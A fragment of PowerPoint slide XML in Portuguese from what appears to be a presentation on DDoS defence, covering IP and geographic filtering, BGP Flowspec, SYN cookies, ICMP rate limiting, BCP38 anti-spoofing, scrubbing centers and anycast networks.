          <p:cNvPr id="80" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="6286500"/>
            <a:ext cx="34147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Bloqueio de tráfego de IPs maliciosos conhecidos ou redes suspeitas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="6543675"/>
            <a:ext cx="3457575" cy="5429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2" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="6600825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BGP Flowspec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="6800850"/>
            <a:ext cx="34147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Distribuição dinâmica de regras de filtragem pela rede para bloquear fluxos de ataque específicos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="7172325"/>
            <a:ext cx="3457575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5" name="Text 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="7229475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Filtragem Geográfica</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="7429500"/>
            <a:ext cx="34147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Bloqueio de tráfego de regiões geográficas não relevantes para o negócio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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800" y="7695605"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Text 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372100" y="7695605"/>
            <a:ext cx="275419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Cuidado com falsos positivos que podem bloquear usuários legítimos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8115300"/>
            <a:ext cx="8572500" cy="22717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0" name="Shape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="8258175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9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063" y="8351044"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="8258175"/>
            <a:ext cx="351977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Configuração Adequada de Firewalls e Roteadores</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4398457" y="8279606"/>
            <a:ext cx="547948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94" name="Text 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4398457" y="8279606"/>
            <a:ext cx="61938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Preventiva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Text 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="8486775"/>
            <a:ext cx="41248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Ajustes para lidar com condições de sobrecarga</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="8715375"/>
            <a:ext cx="2533631" cy="9429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97" name="Text 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="8801100"/>
            <a:ext cx="24336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Ajustes TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Text 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="9029700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Reduzir timeouts de conexão TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Text 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="9172575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Habilitar SYN cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Text 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="9315450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Configurar TCP SYN proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Text 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="9458325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Ajustar tamanhos de backlog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3533756" y="8715375"/>
            <a:ext cx="2533659" cy="9429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3" name="Text 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619481" y="8801100"/>
            <a:ext cx="24336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Proteção ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Text 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619481" y="9029700"/>
            <a:ext cx="243364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Limitar respostas a certos tipos ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Text 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619481" y="9172575"/>
            <a:ext cx="243364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Desabilitar respostas a broadcast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Text 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619481" y="9315450"/>
            <a:ext cx="243364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Configurar rate limiting para ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Text 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619481" y="9458325"/>
            <a:ext cx="243364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Filtrar pacotes ICMP malformados</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Shape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181716" y="8715375"/>
            <a:ext cx="2533631" cy="9429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9" name="Text 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267441" y="8801100"/>
            <a:ext cx="24336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Hardening de Infraestrutura</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Text 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267441" y="9029700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Atualizar firmwares e sistemas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Text 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267441" y="9172575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Implementar anti-spoofing (BCP38)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Text 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267441" y="9315450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Segmentar redes críticas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Text 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267441" y="9458325"/>
            <a:ext cx="24336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Redundância de componentes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="9772650"/>
            <a:ext cx="7829550" cy="4572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15" name="Shape 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="9772650"/>
            <a:ext cx="28575" cy="4572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6" name="Text 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="9872663"/>
            <a:ext cx="61056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Lembre-se:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Text 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="9872663"/>
            <a:ext cx="7475879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Estas medidas de primeira linha são essenciais, mas podem ser insuficientes contra ataques DDoS volumétricos ou sofisticados. Para proteção completa, combine-as com técnicas avançadas de mitigação.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10658475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19" name="Text 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="10744200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20" name="Text 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357797" y="10744200"/>
            <a:ext cx="5718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10/14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="78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2573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 e Defesa: Técnicas Avançadas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Estratégias robustas para lidar com ataques DDoS em larga escala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40005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40005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71625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71625"/>
            <a:ext cx="724426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lidar com ataques volumétricos e sofisticados, são necessárias soluções mais robustas que vão além das medidas básicas de proteção.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285750" y="2028825"/>
            <a:ext cx="4200525" cy="39004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28625" y="217170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2264569"/>
            <a:ext cx="171450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2969" y="2171700"/>
            <a:ext cx="13495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Scrubbing Centers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228264" y="2193131"/>
            <a:ext cx="509662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2228264" y="2193131"/>
            <a:ext cx="581099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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="2400300"/>
            <a:ext cx="20951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Centros especializados de limpeza de tráfego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885825" y="262890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Serviços especializados com infraestrutura massiva e tecnologias dedicadas para absorver e "limpar" o tráfego DDoS:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1017259" y="3557588"/>
            <a:ext cx="428625" cy="428625"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E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46" y="3686175"/>
            <a:ext cx="171450" cy="171450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2400300" y="3557588"/>
            <a:ext cx="428625" cy="428625"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="805AD5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888" y="3686175"/>
            <a:ext cx="171450" cy="171450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3783313" y="3557588"/>
            <a:ext cx="428625" cy="428625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901" y="3686175"/>
            <a:ext cx="171450" cy="171450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1231571" y="3771900"/>
            <a:ext cx="1383013" cy="14288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614613" y="3771900"/>
            <a:ext cx="1383013" cy="14288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3182CE">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923092" y="3486150"/>
            <a:ext cx="76887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E53E3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Tráfego de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3306105" y="3486150"/>
            <a:ext cx="59237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182C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Tráfego limpo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="4600575"/>
            <a:ext cx="3457575" cy="11715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2" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="46863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1085850" y="4886325"/>
            <a:ext cx="32432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de ataque em andamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="5057775"/>
            <a:ext cx="32432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Redirecionamento do tráfego via BGP ou DNS para o scrubbing center</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="5229225"/>
            <a:ext cx="32432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Filtragem do tráfego malicioso usando técnicas avançadas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="5400675"/>
            <a:ext cx="32432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Encaminhamento apenas do tráfego legítimo de volta para a infraestrutura</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="2028825"/>
            <a:ext cx="4200525" cy="388620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8" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="217170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69" y="2264569"/>
            <a:ext cx="171450" cy="171450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5264944" y="2171700"/>
            <a:ext cx="10905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Redes Anycast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6341194" y="2193131"/>
            <a:ext cx="509690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42" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6341194" y="2193131"/>
            <a:ext cx="58112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Absorção</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="2400300"/>
            <a:ext cx="16573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Distribuição geográfica do impacto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="262890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Técnica de roteamento onde o mesmo endereço IP é anunciado de múltiplos locais geográficos (Pontos de Presença - PoPs):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807994" y="3164681"/>
            <a:ext cx="357188" cy="357188"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr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863" y="3257550"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806418" y="3914775"/>
            <a:ext cx="285750" cy="285750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3568" y="3971925"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7260000">
            <a:off x="5943201" y="3346743"/>
            <a:ext cx="1049512" cy="1736119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5852629" y="4200525"/>
            <a:ext cx="26476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56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 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497938" y="3914775"/>
            <a:ext cx="285750" cy="285750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088" y="3971925"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6060000">
            <a:off x="6633830" y="3349018"/>
            <a:ext cx="359763" cy="1731565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544149" y="4200525"/>
            <a:ext cx="26476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56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 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189459" y="3914775"/>
            <a:ext cx="285750" cy="285750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5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6609" y="3971925"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4740000">
            <a:off x="6979582" y="3349018"/>
            <a:ext cx="359763" cy="1731565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7235670" y="4200525"/>
            <a:ext cx="26476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56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 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880979" y="3914775"/>
            <a:ext cx="285750" cy="285750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6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8129" y="3971925"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3540000">
            <a:off x="6980462" y="3346743"/>
            <a:ext cx="1049513" cy="1736119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927191" y="4200525"/>
            <a:ext cx="26476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56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 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272673" y="4271963"/>
            <a:ext cx="1499267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Mesmo IP Anycast em todos os PoPs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="4600575"/>
            <a:ext cx="3457575" cy="10287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65" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
